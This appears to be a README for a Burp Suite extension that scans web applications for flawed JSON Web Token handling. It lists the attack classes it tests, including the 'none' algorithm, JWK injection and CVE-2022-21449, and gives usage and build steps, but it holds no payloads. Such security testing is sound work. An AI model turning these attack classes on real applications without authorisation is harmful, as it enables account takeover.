JWT Scanner is a Burp Suite extension for automated testing of Jason Web Token (JWT) implementations of web applications.
- Signature presence
- Invalid signatures
- Signatures with empty passwords
- Usage of algorithm none variations
- Invalid ECDSA parameters (CVE-2022-21449)
- JWT JWK injection
- Select base request and autodetection of JWT
- Manually select target JWT in source request
Run an active scan or manually select a request from to check:
- Go to Proxy / Repeater / Target / Logger / Intruder
- Select request that requires a authentication with a valid JWT and returns a HTTP 200 response
NOTE: First the extension will resend the selected request without modification and check if the JWT is still valid. If not a Error will be displayed in the Event Log
- Right-click on the request you want to check.
- Extension -> JWT-scanner -> Autodetect JWT
- In case of a identified vulnerability a issue is generated
Autodetect JWT from valid request:
- Highlight the target JWT in request
- Right-click highlighted JWT request
- Extension -> JWT-scanner -> Selected JWT
- In case of a identified vulnerability a issue is generated
- Download the latest pre-built jar file from releases.
- Extender -> Tab Installed -> Add -> Extension Details -> Extension Type: Java -> Select file ...
- Select the downloaded jar
Manually select JWT from valid request:
Using maven to build jar file with dependencies:
mvn package -f pom.xml